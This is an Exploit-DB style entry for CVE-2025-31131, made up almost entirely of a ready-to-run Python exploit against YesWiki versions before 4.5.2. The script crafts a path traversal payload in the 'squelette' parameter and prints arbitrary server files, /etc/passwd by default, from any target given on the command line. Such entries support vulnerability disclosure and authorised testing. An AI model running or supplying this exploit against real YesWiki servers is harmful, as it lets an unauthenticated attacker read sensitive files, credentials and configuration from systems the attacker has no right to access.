YesWiki 4.5.1 - Unauthenticated Path Traversal

EDB-ID:

52135




Platform:

Multiple

Date:

2025-04-07


# Exploit Title: YesWiki < 4.5.2 - Unauthenticated Path Traversal
# Exploit Author: Al Baradi Joy
# Exploit Date: April 6, 2025
# CVE ID: CVE-2025-31131
# Vendor Homepage: https://yeswiki.net/
# Software Link: https://github.com/YesWiki/yeswiki
# Affected Version: < 4.5.2
# Tested On: YesWiki 4.5.1 on Ubuntu 22.04
# Vulnerability Type: Unauthenticated Path Traversal (LFI)
# CVSS Score: 8.6 (High)
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
# Description:
#   YesWiki before version 4.5.2 is vulnerable to unauthenticated path
traversal via the 'squelette' parameter.
#   A remote attacker can exploit this issue to read arbitrary files on the
server, such as /etc/passwd.

import requests
import sys

def banner():
    print("=" * 80)
    print(" YesWiki < 4.5.2 - Unauthenticated Path Traversal
(CVE-2025-31131)")
    print(" Exploit Author: Al Baradi Joy")
    print("=" * 80)

def exploit(target, filename="/etc/passwd"):
    if not target.startswith("http"):
        target = "http://" + target

    traversal = "../" * 8
    encoded_file = filename.replace("/", "%2f")
    payload =
f"/?UrkCEO/edit&theme=margot&squelette={traversal}{encoded_file}&style=margot.css"
    url = target.rstrip("/") + payload

    try:
        print(f"[+] Target: {target}")
        print(f"[+] Attempting to read: {filename}")
        response = requests.get(url, timeout=10)

        if response.status_code == 200 and "root:" in response.text:
            print("[+] Exploit successful. File contents:\n")
            print(response.text)
        else:
            print("[!] Exploit failed or file not readable.")
            print(f"Status Code: {response.status_code}")
            if len(response.text) < 200:
                print(f"Response:\n{response.text}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")

if __name__ == "__main__":
    banner()
    if len(sys.argv) < 2:
        print(f"Usage: python3 {sys.argv[0]} <target_url> [file_to_read]")
        print(f"Example: python3 {sys.argv[0]} http://victim.com
/etc/passwd")
        sys.exit(1)

    target_url = sys.argv[1]
    file_to_read = sys.argv[2] if len(sys.argv) > 2 else "/etc/passwd"
    exploit(target_url, file_to_read)